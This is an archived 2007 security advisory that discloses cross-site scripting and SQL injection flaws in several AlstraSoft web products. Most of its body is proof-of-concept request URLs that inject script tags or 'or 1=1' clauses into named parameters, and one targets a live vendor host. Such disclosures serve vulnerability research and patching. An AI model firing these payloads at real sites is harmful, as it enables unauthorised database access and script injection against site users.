Lucene search
K

alstrasoft-multi.txt

🗓️ 23 Jul 2007 00:00:00Reported by LostmonType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 36 Views

AlstraSoft multiple products are vulnerable to Cross Site Scripting and SQL Injection attack

Code
`####################################################  
AlstraSoft Multiple products multiple Vulnerabilities  
Vendor urL:http://www.alstrasoft.com/products.htm  
Advisore url:http://lostmon.blogspot.com/2007/07/  
alstrasoft-multiple-products-multiple.html  
Vendor notify:yes (webform) Exploit included: yes  
####################################################  
  
  
  
Multiple products of Alstrasoft Are prone vulnerables  
to Cross site scripting and SQL injections style attacks  
  
  
  
################  
examples  
################  
  
For exploit some flaws you need to login  
multiple other variables are afected y all products :S  
  
#####################################  
AlstraSoft Video Share Enterprise  
#####################################  
  
  
http://[Victim]/videoshare/view_video.php?viewkey=  
9c1d0e3b9ccc3ab651bc&msg=Your+feature+request+is+  
sent+"><script>alert()</script>  
  
http://[Victim]/videoshare/view_video.php?viewkey=  
9c1d0e3b9ccc3ab651bc&page=10">&viewtype=&category=mr  
  
http://[Victim]/videoshare/view_video.php?viewkey=  
9c1d0e3b9ccc3ab651bc"><script>alert()</script>  
  
http://[Victim]/videoshare/signup.php?  
next=upload"><script>alert()</script>  
  
http://[Victim]/videoshare/search_result.php?  
search_id=ghgdgdfd"><script>alert()</script>  
  
http://[Victim]/videoshare/view_video.php?  
viewkey=d9607ee5a9d336962c53&page=1&viewtype=">&category=mr  
  
http://[Victim]/videoshare/video.php?  
category=tf"><script>alert()</script>&viewtype=  
  
http://[Victim]/videoshare/video.php?  
page=5"><script>alert()</script>  
  
http://[Victim]/videoshare/compose.php?  
receiver=demo"><script>alert()</script>  
  
http://[Victim]/videoshare/groups.php?  
b=ra&catgy=Recently%20Added"><script>alert()</script>  
  
  
http://[Victim]/videoshare/siteadmin/  
channels.php?a=Search&channelid=&channelname=%22  
%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&search=Search  
  
http://[Victim]/videoshare/siteadmin/muser.php?  
[email protected]&uname=GLAMOROUS"><script>alert()</script>  
  
  
path disclosure:  
  
http://[Victim]/videoshare/uprofile.php?  
UID=53"><script>alert()</script>  
  
http://[Victim]/videoshare/channel_detail.php?  
chid=24"><script>alert()</script>  
  
http://[Victim]/videoshare/uvideos.php?UID=53  
"><script>alert()</script>  
  
http://[Victim]/videoshare/view_video.php?  
viewkey=d9607ee5a9d336962c53&page=1&viewtype=&category=mr'  
  
http://[Victim]/videoshare/groups_home.php?urlkey=  
RSL"><script>alert()</script>  
  
http://[Victim]/videoshare/ufriends.php?UID=253  
"><script>alert()</script>  
  
SQL injection :  
  
http://[Victim]/videoshare/gmembers.php?urlkey=gshahzad&gid=9%20or%201=1  
  
http://[Victim]/videoshare/uvideos.php?UID=253%20or%201=1  
http://[Victim]/videoshare/ugroups.php?UID=253%20or%201=1  
http://[Victim]/videoshare/uprofile.php?UID=253%20or%201=1  
http://[Victim]/videoshare/uvideos.php?UID=253%20or%201=1&type=public  
http://[Victim]/videoshare/uvideos.php?UID=253%20or%201=1&type=private  
http://[Victim]/videoshare/ufavour.php?UID=253 or 1=1  
http://[Victim]/videoshare/ufriends.php?UID=253 or 1=1  
http://[Victim]/videoshare/uplaylist.php?UID=253 or 1=1  
http://[Victim]/videoshare/ugroups.php?UID=253 or 1=1  
  
  
  
###########################################  
AlstraSoft Text Ads Enterprise  
###########################################  
  
http://[Victim]/ads/forgot_uid.php?r=1"><script>alert()</script>  
  
http://[Victim]/ads/search_results.php?query="><script>alert()</script>  
  
http://[Victim]/ads/search_results.php?query=lala&sk=AlexaRating"><script>alert()</script>  
  
http://[Victim]/ads/website_page.php?pageId=1004"><script>alert()</script>  
  
  
#########################################  
AlstraSoft SMS Text Messaging Enterprise  
########################################  
  
  
http://[Victim]/admin/membersearch.php?pagina=17&q=  
la&domain=Walltrapas.es%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E  
  
http://[Victim]/admin/edituser.php?userid=  
Walltrapas"><script>alert()</script>  
  
http://[Victim]/admin/membersearch.php?  
q=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&B1=Submit  
  
  
#################################################  
e-friends  
  
http://alstrahost.com/friends/index.php?mode=  
people_card&p_id=927"><script>alert()</script>  
  
this is a persistent XSS  
  
  
########################################  
AlstraSoft Affiliate Network Pro  
########################################  
  
http://[Victim]/affiliate/merchants/index.php?  
Act=programedit&mode=edit&id=42"><script>alert()</script>  
  
http://[Victim]/affiliate/merchants/index.php?Act=  
programedit&mode=edit&id=42&msg=Program%20Edited%20Success  
fully"><script>alert()</script>  
  
http://[Victim]/affiliate/merchants/index.php?Act=  
uploadProducts&pgmid=41%20or%201=1 // SQL And XSS  
  
http://[Victim]/affiliate/merchants/index.php?Act=  
daily&d=9&m=07&y=2007 // all variables XSS affected except Act  
  
http://[Victim]/affiliate/merchants/index.php?Act=  
ProgramReport&programs=All&err=Please%20Enter%20Valid%20Date  
"><script>alert()</script>  
  
http://[Victim]/affiliate/merchants/index.php?Act=  
LinkReport&sub=View&i=1&txtto=17/07/2007&txtfrom=12/07/2007  
&programs=All // all variables XSS affceted except Act y sub  
  
http://[Victim]/affiliate/merchants/temp.php?rowid=  
5"><script>alert()</script> // posible SQL too  
  
http://[Victim]/affiliate/merchants/index.php?Act=  
add_money&msg=Please%20Enter%20A%20valid%20amount"><script>alert()</script>  
&modofpay=Authorize.net&bankname=&bankno=&  
bankemail=&bankaccount=&payableto=&minimumcheck=&affiliateid=  
  
####################################  
AlstraSoft Article Manager Pro  
####################################  
  
http://[Victim]/article/contact_author.php?  
userid=1%20"><script>alert()</script>  
  
#######################################  
AlstraSoft AskMe Pro  
#######################################  
  
http://[Victim]/ask/forum_answer.php?que_id=85%20or%201=1 // SQL  
  
http://[Victim]/ask/search.php?cat_id=14-18%20or%201=1 // SQL  
  
http://[Victim]/ask/search.php?status=Pending&cat_id="><script>alert()</script>  
http://[Victim]/ask/search.php?status=Pending&cat_id=1%20or%201=1 // SQL  
http://[Victim]/ask/register.php?typ=expert"><script>alert()</script>  
  
###################### €nd ########################  
  
Thnx to estrella to be my ligth.  
Thnx to all Lostmon Team !!!  
  
--  
atentamente:  
Lostmon ([email protected])  
Web-Blog: http://lostmon.blogspot.com/  
Google group: http://groups.google.com/group/lostmon (new)  
  
--  
La curiosidad es lo que hace mover la mente....  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation